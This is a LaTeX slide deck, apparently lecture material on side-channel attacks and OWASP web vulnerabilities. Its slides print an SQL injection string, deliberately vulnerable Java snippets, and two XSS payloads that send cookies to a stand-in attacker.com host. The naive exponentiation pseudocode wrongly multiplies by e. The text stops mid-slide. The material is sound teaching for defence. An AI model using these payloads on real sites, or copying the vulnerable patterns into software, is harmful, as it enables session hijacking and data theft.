\input{../common/header.tex}
\input{../common/cmds.tex}

\title{Ch. 6 - Vulnerabilities}

\begin{document}
\input{../common/front.tex}

\begin{frame}
\frametitle{Hackerman}
\begin{exampleblock}<+->{Question}
	\begin{itemize}[<+->]
	\item How to bypass a cryptographic system without the proper access codes, keys, etc.?
	\end{itemize}
\end{exampleblock}
\begin{block}<+->{Part of an answer}
	\begin{itemize}[<+->]
	\item Exploit hardware or the mathematical logic of algorithms
	\end{itemize}
\end{block}
\begin{itemize}[<+->]
\item Two main techniques
	\begin{enumerate}
	\item trial and failure
	\item technical characteristics analysis
	\end{enumerate}
\item Here, the opponent often has an partial of complete access to the system
	\begin{itemize}
	\item Physical access, database tables, etc.
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Analysis}
\begin{itemize}[<+->]
\item During their execution, cipher algorithms perform several operations
\item These operations have technical consequences
	\begin{enumerate}
	\item Memory storage
	\item Execution time
	\item Electrical consumption
	\item Electromagnetic radiation
	\item Physical noise
	\item Data traffic, etc.
	\end{enumerate}
\item Analysing these "side effects" may allow to deduce sensitive information
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Web vulnerabilities}
\begin{itemize}[<+->]
\item A large part of web traffic goes through web sites
	\begin{itemize}
	\item Or mobile applications
	\end{itemize}
\item Attack this specific part of traffic
	\begin{itemize}
	\item Not directly the algorithms
	\end{itemize}
\item Objectives
	\begin{itemize}
	\item Get sensitive information
	\item Unauthorised access
	\item Make the system believe you are somebody else
	\end{itemize}
\item We will go over the most common vulnerabilities
\end{itemize}
\end{frame}

\section{Data remanence attack}

\begin{frame}
\frametitle{Idea}
\begin{itemize}[<+->]
\item Exploit persistence of memory
	\begin{itemize}
	\item Variables stored in memory and not used
		\begin{itemize}
		\item Stack deallocation only increases \texttt{rbp}
		\item Heap deallocation only notifies the OS
		\end{itemize}
	\item Data erased from hard drives
		\begin{itemize}
		\item Removing a file only removes an entry from an index
		\end{itemize}
	\end{itemize}
\item "Erased" data is still there
\item Different types of threat
	\begin{itemize}
	\item Find the address of a variable or function
		\begin{itemize}
		\item Change the value in memory
		\item Change the return address (buffer overflow)
		\end{itemize}
	\item Recover sensitive information (file system, heartbleed)
	\end{itemize}
\item Necessity
	\begin{itemize}
	\item to erase your tracks
	\item to check integrity
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The attack}
\begin{itemize}[<+->]
\item Four \cpp\ examples
	\begin{itemize}
	\item Use \texttt{ptrace} and \texttt{memscan} to find an address
	\item Change the content of this address
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Question}
	\begin{itemize}[<+->]
	\item How to protect yourself?
	\end{itemize}
\end{exampleblock}
\begin{block}<+->{Part of an answer}
	\begin{itemize}[<+->]
	\item Desktop
		\begin{itemize}
		\item Canaries
		\item Double-compilations
		\end{itemize}
	\item Client
		\begin{itemize}
		\item Check integrity on server-side
		\end{itemize}
	\end{itemize}
\end{block}
\end{frame}

\begin{frame}
\frametitle{Canaries}
\begin{exampleblock}<+->{Designing canaries}
	\begin{itemize}[<+->]
	\item Canaries should not be overflown
	\item The address of canaries should not be found
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Usually, canaries are random and placed in the data segment
	\begin{itemize}
	\item They cannot be overflown from \texttt{ss}
	\item Their address cannot be easily found with \texttt{memscan}
	\end{itemize}
\item Stackguard is a polular technique allowing the transparent implementation of canaries to protect the stack against buffer overflow
	\begin{itemize}
	\item Activated by default in \texttt{gcc}
	\end{itemize}
\item Sometimes, manual implementation of canaries is necessary to protect dedicated variables
\end{itemize}
\end{frame}

\section{Side channel attack}

\begin{frame}
\frametitle{Principle}
\begin{itemize}[<+->]
\item Instead of directly attacking an algorithm, we attack its implementation
	\begin{itemize}
	\item hardware : the way the architecture executing the algorithm is built
	\item software : the set of instructions executed by the algorithm
	\end{itemize}
\item Idea : deduce sensitive information, based on observations 
	\begin{itemize}
	\item variations in consumption, radiation
	\item variations in execution time
	\item injections
	\end{itemize}
\item Based on technical experiences, trial / failure, etc.
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Electric consumption analysis}
\begin{itemize}
\onslide<1-> \item Monitor input and output electricity on processor pins
	\begin{itemize}
	\onslide<2-> \item With electronic oscilloscope
	\end{itemize}
\onslide<3-> \item Analyse consumption variations
\onslide<4-> \item Some operations need more power
	\begin{itemize}
	\onslide<5-> \item More instructions = more energy
	\end{itemize}
\begin{center}
\visible<6->{\includegraphics[width=8cm]{pics/Power_attack.png}}
\end{center}
\onslide<7-> \item Very hard to detect and counter (passive)
	\begin{itemize}
	\onslide<8-> \item Build / implement correctly
		\begin{itemize}
		\onslide<9-> \item Variation in power cannot disclose information
		\end{itemize}
	\onslide<10-> \item Reduce electricity consumption
		\begin{itemize}
		\onslide<11-> \item Harder to analyse
		\end{itemize}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Electromagnetic radiation analysis}
\begin{itemize}[<+->]
\item Same principle as electrical power analysis
\item EM radiation analysis
\item Each instruction has a specific radiation
\item Monitor and record while ciphering
\item Build up statistical models
\item Perform local search to find the key
\item Solution
	\begin{itemize}
	\item Faraday plating
	\item Algorithm randomisation
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Montgomerry powering ladder}
\begin{itemize}[<+->]
\item Programming technique allowing to fight against attacks based on
	\begin{itemize}
	\item electrical power analysis
	\item EM radiation analysis
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Principle}
	\begin{itemize}[<+->]
	\item Add additional instructions to cover your tracks
	\item idea: the same instructions must be executed in every if/else branches
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item If the same instructions are executed whatever branching the program takes, both power consumption and EM radiation are the same
\item Drawback: performance
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Naive Exponentiation}
%\begin{algorithm}
\begin{algorithmic}[1]
\REQUIRE $b \in \IR, e \in \IN$
\ENSURE $b^e$
\IF{$e = 0$}
	\RETURN $1$
\ENDIF
\STATE $r \leftarrow b$
\FOR{$1 \leqslant i \leqslant e$}
	\STATE $r \leftarrow r \times e$
\ENDFOR
\RETURN $r$
\end{algorithmic}
%\caption{Algorithme Exp(b, e)}
%\end{algorithm}
\end{frame}

\begin{frame}
\frametitle{Fast exponentiation\texttt{FastExp(b,e,m)}}
%\begin{algorithm}
\begin{algorithmic}[1]
\REQUIRE $b \in \IR, e \in \IN$
\ENSURE $b^e$
\IF{$e = 0$}
	\RETURN $1$
\ELSIF{$e = 1$}
	\RETURN $b$
\ELSIF{$e \mod 2 = 0$}
	\RETURN \texttt{FastExp(}$b \times b$\texttt{,}$e \DIV 2$\texttt{)}
\ELSE
	\RETURN $b~\times$ \texttt{FastExp(}$b \times b$\texttt{,}$e \DIV 2$\texttt{)}
\ENDIF
\end{algorithmic}
%\caption{Algorithme FastExp(b,e)}
%\end{algorithm}
\end{frame}

\begin{frame}
\frametitle{Montgomerry powering ladder \texttt{MontgExp(b,e,m)}}
%\begin{algorithm}
\begin{algorithmic}[1]
\REQUIRE $b \in \IR, e \in \IN$
\ENSURE $b^e$
\IF{$e = 0$}
	\RETURN $1$
\ELSIF{$e = 1$}
	\RETURN $b$
\ELSIF{$e \mod 2 = 0$}
	\STATE $x \leftarrow~$ \texttt{MontgExp(}$b \times b$\texttt{,}$e \DIV 2$\texttt{)}
	\STATE $y \leftarrow~$ $b~\times$ \texttt{MontgExp(}$b \times b$\texttt{,}$e \DIV 2$\texttt{)}
	\RETURN $x$
\ELSE
	\STATE $x \leftarrow~$ \texttt{MontgExp(}$b \times b$\texttt{,}$e \DIV 2$\texttt{)}
	\STATE $y \leftarrow~$ $b~\times$ \texttt{MontgExp(}$b \times b$\texttt{,}$e \DIV 2$\texttt{)}
	\RETURN $y$
\ENDIF
\end{algorithmic}
\end{frame}

\begin{frame}
\frametitle{Naive modular exponentiation}
\begin{algorithmic}[1]
\REQUIRE $b,e,m \in \IN$
\ENSURE $b^e \mod m$
\IF{$m = 1$}
	\RETURN $0$
\ENDIF
\STATE $r \leftarrow 1$
\FOR {$1 \leqslant i \leqslant e$}
	\STATE $r \leftarrow (r \times b) \mod m$
\ENDFOR
\RETURN $r$
\end{algorithmic}
%\caption{Algorithme ModExp(b,e,m)}
%\end{algorithm}
\end{frame}

\begin{frame}
\frametitle{Fast modular exponentiation}
\begin{algorithmic}[1]
\REQUIRE $b,e,m \in \IN$
\ENSURE $b^e \mod m$
\IF{$m = 1$}
	\RETURN $0$
\ENDIF
\STATE $r \leftarrow 1$
\WHILE{$e > 1$}
	\IF{$e \mod 2 = 1$}
		\STATE $r = (r \times b) \mod m$
	\ENDIF
	\STATE $e \leftarrow e \DIV 2$
	\STATE $b \leftarrow (b \times b) \mod m$
\ENDWHILE
\RETURN $r$
\end{algorithmic}
\end{frame}

\begin{frame}
\frametitle{Montgomery Modular Powering Ladder}
\begin{algorithmic}[1]
\REQUIRE $b,e,m \in \IN$
\ENSURE $b^e \mod m$
\IF{$m = 1$}
	\RETURN $0$
\ENDIF
\STATE $r \leftarrow 1$
\WHILE{$e > 1$}
	\STATE $x \leftarrow (r \times b) \mod m$
	\STATE $y \leftarrow r$
	\IF{$e \mod 2 = 1$}		
		\STATE $r \leftarrow x$
	\ELSE
		\STATE $r \leftarrow y$
	\ENDIF
	\STATE $e \leftarrow e \DIV 2$
	\STATE $b \leftarrow (b \times b) \mod m$
\ENDWHILE
\RETURN $r$
\end{algorithmic}
\end{frame}

\begin{frame}
\frametitle{Temporal attack}
\begin{itemize}[<+->]
\item Cipher algorithms take a variable time to cipher data
	\begin{itemize}
	\item Depends on the key (and, sometimes, the data)
	\end{itemize}
\item Each instruction takes a different time to run
	\begin{itemize}
	\item Analysing time allows to deduce information about the key
	\item What if/else block the program runs-
	\end{itemize}
\item Build up time tables
	\begin{itemize}
	\item Comparison with theoretical execution times
	\item Requires information on the ciphering functions
		\begin{itemize}
		\item Fast exponentiation, modular exponentiation, etc.
		\end{itemize}
	\end{itemize}
\item Solutions
	\begin{itemize}
	\item Variable time procedures
	\item Noise induction
	\item Fixed time processing (costy if repeated)
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Fault injection attack}
\begin{itemize}[<+->]
\item Idea: inject wrong values in a system to analyse its behaviour
	\begin{itemize}
	\item Most of the time only possible with a direct memory access
	\end{itemize}
\item Allows to partially recover the key
\item Protections similar to data remanence
	\begin{itemize}
	\item Canaries
	\item Compiler \texttt{nop}
	\item Randomisation
	\end{itemize}
\item Other attacks
	\begin{itemize}
	\item Acoustic analysis
	\item Network traffic analysis
	\end{itemize}
\end{itemize}
\end{frame}

\section{OWASP vulnerabilities}

\begin{frame}
\frametitle{The web}
\begin{itemize}[<+->]
\item A large part of internet traffic goes through web and mobile applications
	\begin{itemize}
	\item Static and dynamic sites
	\end{itemize}
\item Other type of traffic
	\begin{itemize}
	\item Desktop applications
	\item Server applications
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Questions}
	\begin{itemize}[<+->]
	\item What are the most common vulnerabilities?
	\item How to detect vunlerabilities?
	\item How to protect against attacks?
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Sources}
\begin{itemize}[<+->]
\item Vulnerabilities are often detected by
	\begin{itemize}
	\item white hat hackers,
	\item NGO
	\end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Source for this session}
	\begin{itemize}[<+->]
	\item OWASP (Open Web Application Security Project)
	\item Community annually updating a survey
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Do not trust the keynotes of companies
	\begin{itemize}
	\item Conflict of interest
	\end{itemize}
\item We see part of the OWASP 10, and CSRF
	\begin{itemize}
	\item No XXE, insecure deserialisation
	\end{itemize}
\end{itemize}
\end{frame}

\subsection{Injections} %injection sql, injection url

\begin{frame}
\frametitle{Principle}
\begin{exampleblock}<+->{Idea}
	\begin{itemize}[<+->]
	\item Send unverified data to a parser, that is going to execute them as instructions
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Web server, browsers, databases are targeted
\item Several entry points
	\begin{itemize}
	\item SQL injection
	\item URL injection
	\item XQuery injection
	\item Javascript injection
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{center}
\includegraphics[height=.8\textheight]{pics/injection.jpg}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{itemize}[<+->]
\item An attacker could be anyone able to send unverified data
	\begin{itemize}
	\item Basically, any user, external or not
	\end{itemize}
\item Very common vulnerability, easily exploitable
\item High severity: could lead to permanent data loss, leaking sensitive information, etc.
\item Relatively easy to detect
\end{itemize}
\begin{exampleblock}<+->{Basic hygiene}
	\begin{itemize}[<+->]
	\item If the input comes from a user, do not trust it
		\begin{itemize}
		\item Some inputs come from the environment (environment variables, etc.)
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item Vulnerable code
\end{itemize}
\begin{lstlisting}
String query = "SELECT * FROM logins WHERE id='" + request.getParameter("id") + "'";
\end{lstlisting}
\begin{itemize}
\item Attack
	\begin{itemize}
	\item In "id", enter "\lstinline|' or '1'='1|"
	\end{itemize}
\item Executed request
\end{itemize}
\begin{lstlisting}
"SELECT * FROM logins WHERE id='' or '1'='1'"
\end{lstlisting}
\begin{itemize}
\item Returns the entire password table
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Protection}
\begin{exampleblock}<+->{Principle of isolation}
	\begin{itemize}[<+->]
	\item Always and clearly separate data from code
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item If an input is meant to be used as data, it should be strictly used as data
\item None of its content should be used as code
\item If the input is a mix of both, they should be clearly marked
\item Most frameworks implement this principle
	\begin{itemize}
	\item Prepared statements against SQL injections
	\item Escape characters
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection et prevention}
\begin{exampleblock}<+->{Detection}
	\begin{itemize}[<+->]
	\item Carefully examine the code and make sure the rinciple of isolation is well implemented
		\begin{itemize}
		\item Automatic analysers
		\item Automatic penetration tests
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Prevention}
	\begin{itemize}[<+->]
	\item Favour, by order of preference,
		\begin{enumerate}
		\item Using API avoiding parsers
		\item Using escape characters
		\item Using white lists of allowed entries
		\end{enumerate}
	\end{itemize}	
\end{exampleblock}
\end{frame}

\subsection{Broken authentication}

\begin{frame}
\frametitle{Overview}
\begin{exampleblock}<+->{Principle}
	\begin{itemize}[<+->]
	\item Take the rights of another user, through bad session management or improper authentication
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Unsafe password transmission and storage
	\begin{itemize}
	\item Plain transmission, "pass the hash"
	\end{itemize}
\item Weak access codes (passwords, sessions ids)
	\begin{itemize}
	\item Length, complexity, rotation
	\item Recovery policy
	\end{itemize}
\item Session ids without timeout or not revoked on disconnection
\item Wrong assignment of new identifiers
	\begin{itemize}
	\item Recover a valid id
	\item Make a proper user log in with that id
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{itemize}[<+->]
\item Attacker: any malicious extern or intern user
\item Average exploitability
\item Common vulnerability
\item Average detectability
\item High severity
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{itemize}[<+->]
\item A website allows URL rewriting
	\begin{itemize}
	\item \url{http://brol.be/promos/liste;jsessid=2P0OC2JSNDLPSKHCJUN2JV?cat=electro}
	\item A user shares the URL on social network to communicate the discounts
	\item Using the link provides the session id, disclosing credit card information, personal information, etc.
	\end{itemize}
\item A website does not implement timeouts properly or session ids rotations
	\begin{itemize}
	\item On a shared (or public) computer, a user does not use "Log out", but closes the browser
	\item An attacker using the same browser later is still logged in on the site
	\end{itemize}
\item An attacker gains access to the password table, unsalted but hashed
	\begin{itemize}
	\item All accounts are potentially vulnerable
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Use proper authentication schemes}
\begin{itemize}[<+->]
\item Implement weak password-checks
\item Align password policies with NIST 800-63 B\footnote{\url{https://pages.nist.gov/800-63-3/sp800-63b.html} - Accessed last \today}, sections 5, 6 and 7
	\begin{itemize}
	\item Hygiene for a strong password policy
	\end{itemize}
\item Do not implement password rotation
	\begin{itemize}
	\item Encourages users to reuse passwords, to use weak ones, etc.
	\end{itemize}
\item Limit or increasingly delay failed login attempts
	\begin{itemize}
	\item And log failures
	\end{itemize}
\item Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks
	\begin{itemize}
	\item Use the same error message for all outcomes
	\end{itemize}
\item Do not ship or deploy with any default credentials
	\begin{itemize}
	\item Especially for admin users
	\end{itemize}
\item Implement multi-factor authentication
\item Properly rotate invalidate authentication tokens
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Bad session management}
\begin{alertblock}<+->{Hygiene}
	\begin{itemize}[<+->]
	\item Sessions must be destroyed on the server side
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Properly rotate session ids after successful login
\item Properly invalidate session ids
	\begin{itemize}
	\item Force timeouts
	\end{itemize}
\item Properly rotate cookies
	\begin{itemize}
	\item Reset during authentication state changes
	\item When one type of user changes for another type
	\end{itemize}
\item Do not expose session ids in URL
\item Implement a unique session management
	\begin{itemize}
	\item Implies to use a simple interface for developers
	\end{itemize}
\end{itemize}
\end{frame}

\subsection{Broken access control}

\begin{frame}
\frametitle{Principle}
\begin{exampleblock}<+->{Idea}
	\begin{itemize}
	\item Access a restricted resource of functionality by "guessing" a name
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item For data, applications and API often use the real name or id of an object
	\begin{itemize}
	\item For retrieval or page generation
	\end{itemize}
\item For functions, URLs and function names are often easily predictable
\item Applications and API do not always check that a \emph{registered} user has access to some resource
\item Manipulate parameters and attack (injection)
\item Careful code analysis often allows to detect and prevent such attacks
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item SignedObject > SealedObject > Message 
	\begin{itemize}
	\item Message is a quadruplet (login, pwd, usrId, resId)
	\end{itemize} 
\end{itemize}
\begin{lstlisting}
public Entry[] processRetrieval(SignedObject sm)
	throws SecurityException, AuthentificationException, IllegalAccessException
{
	if(sm.verify(s_publicKey, s_engine)) //check signature
	{
		SealedObject ciphered = (SealedObject)sm.getObject(); //recover ciphered object
		Message plain = (Message)ciphered.getObject(c_privateKey); //remove cipher
		
		boolean ok = auth_mgr.auth(plain.login(), hash.digest(plain.passwd().getBytes()));
		if(ok) //user is authenticated successfully
		{
			boolean access = access_mgr.check(plain.getUserId(), plain.getRessourceId());
			
			if(access)
				return db_mgr.retrieveEntries(plain.getUserId(), plain.getRessourceId());
			else
				throw new IllegalAccessException("Ressource access denied");
		}		
		else
			throw new AuthentificationException("Invalid login/password");
	}
	else
		throw new SecurityException("Invalid message signature");
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}[<+->]
\item An attacker is \emph{always} a registered user
\item Such an attack can be easily exploited
\item These a vulnerabilities are \emph{very} common
\item These vulnerabilities can be easily detected
\item Moderated severity
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Prevention}
\begin{itemize}[<+->]
\item Verify that \emph{all} data and function references have appropriate defenses
\item After regular authentication, 
	\begin{itemize}
	\item for data reference, make sure the application (server) ensures the user is authorized for that data, e.g., with a reference map
	\item for function reference, make sure the application ensures the user has required privileges for a call
	\end{itemize}
\item Each use of a reference from an untrusted source must include access control
\item Use indirect references
	\begin{itemize}
	\item Do not use DB keys
	\item For user $x$, drop down a list of authorized resources / functions from $1$ to $k$
	\item This id denotes selection, \emph{not a resource}
	\item A user-depending table maps selection to resources / functions
	\end{itemize}
\item Implement the principle of least privilege
\end{itemize}
\end{frame}


\subsection{Cross-site scripting (XSS)}

\begin{frame}
\frametitle{Same Origin Policy}
\begin{itemize}[<+->]
\item Forbids a web application to retrieve content from pages with another origin
	\begin{itemize}
	\item Cross-origin content
	\end{itemize}
\item Random websites cannot not read or modify data from your Facebook page or PayPal account while logged in to them.
\item Extremely important security principle implemented in browsers
\end{itemize}
\begin{example}<+->{Example}
	\begin{itemize}[<+->]
	\item \lstinline|https://example.com/index.html| can access content from \lstinline|https://example.com/about.html|
	\item \lstinline|https://attacker.com/index.html| cannot access content from \lstinline|https://example.com/about.html|
	\end{itemize}
\end{example}
\begin{itemize}[<+->]
\item XSS attacks bypass SOP
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Principle}
\begin{itemize}[<+->]
\item Happens when a dynamic page is updated with unsanitised user input
\item The attacker runs a script in the client's browser to
	\begin{itemize}
	\item steal the session of a user
	\item insert hostile content on a page
	\item redirect a user on the attacker's web page
	\end{itemize}
\item Attack vector similar to some form of injections
	\begin{itemize}
	\item Here, we use Javascript
	\end{itemize}
\item Server side: the server's code uses user input to generate a web page
	\begin{itemize}
	\item Detection is easy (cf. injection)
	\end{itemize}
\item Client side: the client uses user data to dynamically generate elements of a page
	\begin{itemize}
	\item Can be really hard to detect
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Three types of XSS}
\begin{exampleblock}<+->{Reflected XSS}
	\begin{itemize}[<+->]
	\item The application includes unsanitised user input as part of HTML output
	\item If successful, allows the attacker to execute arbitrary JavaScript in the victim’s browser
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Stored XSS}
	\begin{itemize}[<+->]
	\item The application stores unsanitized user input, viewed later
	\item Often considered a high or critical risk (if viewed by administrator)
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Document Object Model XSS}
	\begin{itemize}[<+->]
	\item XSS appearing in the DOM instead of part of the HTML
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}
\item Attacker: anyone able to send unverified data
\item Average exploitability
\item Extremely common vulnerability
\item Average detectability
\item Moderate to very high severity (in the case of stored XSS)
\end{enumerate}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example of reflected XSS}
\begin{itemize}
\item Vulnerable code
\end{itemize}
\begin{lstlisting}
(String) page += "<input name='creditcard' type='TEXT' value='" 
				+ request.getParameter("CC") + "'>";
\end{lstlisting}
\begin{itemize}
\item Attack: replace parameter "CC" by
\end{itemize}
\begin{lstlisting}
'><script>document.location=
		'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
\end{lstlisting}
\begin{itemize}
\item Sessions ids and cookies are sent to the attacker's web page
\item The attacker can then steal the user's session
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example of stored XSS}
\begin{itemize}
\item Vulnerable code
\end{itemize}
\begin{lstlisting}
Username: user123<script>document.location='https://attacker.com/?cookie='
					+encodeURIComponent(document.cookie)</script>
Registered since: 2016
\end{lstlisting}
\begin{itemize}
\item That code is triggered every time a user visits this forum section
\item Sends the message board user's cookies that is stored in the user's browser to the attacker
	\begin{itemize}
	\item Cookies are "stealed"
	\end{itemize}
\item The attacker uses them to hijack the user's sessions
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection}
\begin{exampleblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item In reflected and stored XSS,  you can see the vulnerability payload in the response
	\item In DOM, the HTML source code and response of the attack will be exactly the same
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Solution}
	\begin{itemize}[<+->]
	\item Code analysis
	\item Automated tools
		\begin{itemize}
		\item Client side: very few tools considering the diversity of APIs
		\end{itemize}
	\end{itemize}
\end{exampleblock}	
\end{frame}

\begin{frame}
\frametitle{Prevention}
\begin{itemize}[<+->]
\item \emph{Do not} send unverified data to Javascript
\item Use frameworks that automatically escape XSS by design
	\begin{itemize}
	\item Learn the limitations of each framework’s XSS protection and appropriately handle them
	\end{itemize}
\item Escape untrusted HTTP request data based on the context in the HTML output (Reflected and stored)
\item Applying context-sensitive encoding when modifying the browser document on the client side (DOM)
\item Use validation libraries\footnote{\url{https://www.owasp.org/index.php/AntiSamy} and \url{https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project}}
\item Enable Content Security Policy
	\begin{itemize}
	\item Defense-in-depth mitigating control against XSS
	\item Effective if no other vulnerabilities exist that would allow placing malicious code via local file includes
	\end{itemize}
\end{itemize}
\end{frame}

\subsection{Security misconfiguration}

\begin{frame}
\frametitle{Principle}
\begin{exampleblock}<+->{Vulnerability}
\begin{itemize}[<+->]
\item Exploit unpatched flaws or default configuration
	\begin{itemize}
	\item Not directly application-dependent
	\end{itemize}
\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Missing security hardening
\item Improperly configured permissions on cloud services
\item Unnecessary features are enabled or installed
	\begin{itemize}
	\item Ports, services, unused web pages, accounts, etc.
	\end{itemize}
\item Error handling reveals stack traces or other overly informative error messages
\item Latest security features are disabled or not configured securely
\item Security settings in servers, frameworks, libraries, databases, etc. not set to secure values
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}
\item Attacker: anyone
\item Easily exploitable
\item Common vulnerability
\item Easy detection
\item Moderate severity
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{itemize}[<+->]
\item Administration console is automatically installed and not deleted
\item Default administration accounts are not deactivated and their access codes are set to default values
\item Directory listing is not disabled on the web server
	\begin{itemize}
	\item An attacker can retrieve compiled files, retro-engineer them and find a flaw
	\end{itemize}
\item The application server’s configuration allows detailed error messages
	\begin{itemize}
	\item Vulnerable version number (component with known vulnerability), table and attribute names, stack traces, etc.
	\end{itemize}
\item Port scanning is not disabled
\item Access ports to a server application are defaulted
\item Cloud service provider has default sharing permissions open to the internet by other CSP users
	\begin{itemize}
	\item Allows sensitive data stored within cloud storage to be accessed
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection et prevention}
\begin{exampleblock}<+->{Detection}
	\begin{itemize}[<+->]
	\item Automated scanners
	\item Developers and system administrators must work together
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Prevention}
	\begin{itemize}[<+->]
	\item Several security recommendations to follow
	\item A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down must be implemented
		\begin{itemize}
		\item The system must be safe again, and fast
		\end{itemize}
	\item Keep the system updated
	\item Send security directives and headers to clients
	\end{itemize}	
\end{exampleblock}
\end{frame}

\subsection{Sensitive data exposure}

\begin{frame}
\frametitle{Principle}
\begin{itemize}[<+->]
\item An attacker usually does not attack a cryptographic system
\item Attacks either data storage or transmission
	\begin{itemize}
	\item Key theft
	\item MITMA
	\item Plain data theft from outside of server context
		\begin{itemize}
		\item Client browser, transmission, etc.
		\end{itemize}
	\end{itemize}
\item A server is usually harder to attack (limited access)
\item A successful attack usually compromises \emph{all} sensitive data
	\begin{itemize}
	\item Passwords
	\item credit card information
	\item Medical and or personal data
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}
\item Attacker: anyone who could access sensitive data
	\begin{itemize}
	\item Or their backups
	\end{itemize}
\item Hard exploitability
\item Uncommon vulnerability
\item Average detectability
\item High severity
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{itemize}[<+->]
\item Credit card numbers are ciphered in a database
	\begin{itemize}
	\item Database auto-ciphering
	\item Auto-deciphering on access
	\item An SQL injection flaw discloses plain sensitive data
	\end{itemize}
\item A site does not use SSL/TLS for authenticated pages
	\begin{itemize}
	\item An attacker monitors traffic
	\item He steals the cookie of a user's session
	\item He replaces that cookie and accesses private data related to that user
	\end{itemize}
\item A database stores passwords unsalted
	\begin{itemize}
	\item A security flaw allows an attacker to recover the password file
	\item A rainbow attack compromises all passwords
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection}
\begin{itemize}[<+->]
\item Is sensitive data (and its backups) 
	\begin{itemize}
	\item stored as plain text?
	\item transmitted (on internal and external traffic) as plain text?
	\end{itemize}
\item A deprecated or out-of-date cryptographic system is used
\item Cryptographic key generation is weak
	\begin{itemize}
	\item Length, rotation, etc.
	\end{itemize}
\item Missing browser directives while sending or retrieving sensitive data
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Prevention}
\begin{itemize}[<+->]
\item We already saw many ways to secure a cryptographic system
\item In the context of web security, it is required at least, to
	\begin{enumerate}
	\item Cipher all sensitive data, whether they are transmitted or stored
	\item Do not store useless sensitive data
		\begin{itemize}
		\item A user payed with his credit card? Delete the card recording
		\item What is not stored cannot be stolen
		\end{itemize}
	\item Make sure the right and strong enough algorithms and keys are used (as well as their handling)
		\begin{itemize}
		\item Module certification
		\end{itemize}
	\item Use dedicated cryptographic hash function for password storage
		\begin{itemize}
		\item PBKDF2, bcrypt, scrypt
		\end{itemize}
	\item Deactivate sensitive data auto-completion and the caching of pages containing sensitive data sensibles
	\end{enumerate}
\end{itemize}
\end{frame}

\subsection{Insufficient monitoring and protection against attacks}

\begin{frame}
\frametitle{Principle}
\begin{itemize}[<+->]
\item Every attacker wants to avoid being detected
\item Rely on the lack of monitoring and timely response
\item In many cases, invalid entries are ignored
	\begin{itemize}
	\item If this entry is generated with malicious intent, the attacker can try again
	\end{itemize}
\item If multiple invalid entries are repeated, it can denote malicious intent
	\begin{itemize}
	\item Goal: seek vulnerabilities
	\end{itemize}
\item Penetration testing and scans by DAST tools do not trigger alerts
\item Auditable events, such as logins, failed logins, and high-value transactions are not logged
\item The system must react properly to avoid manual and automated attacks
	\begin{itemize}
	\item At what pace can system administrators deploy a patch?
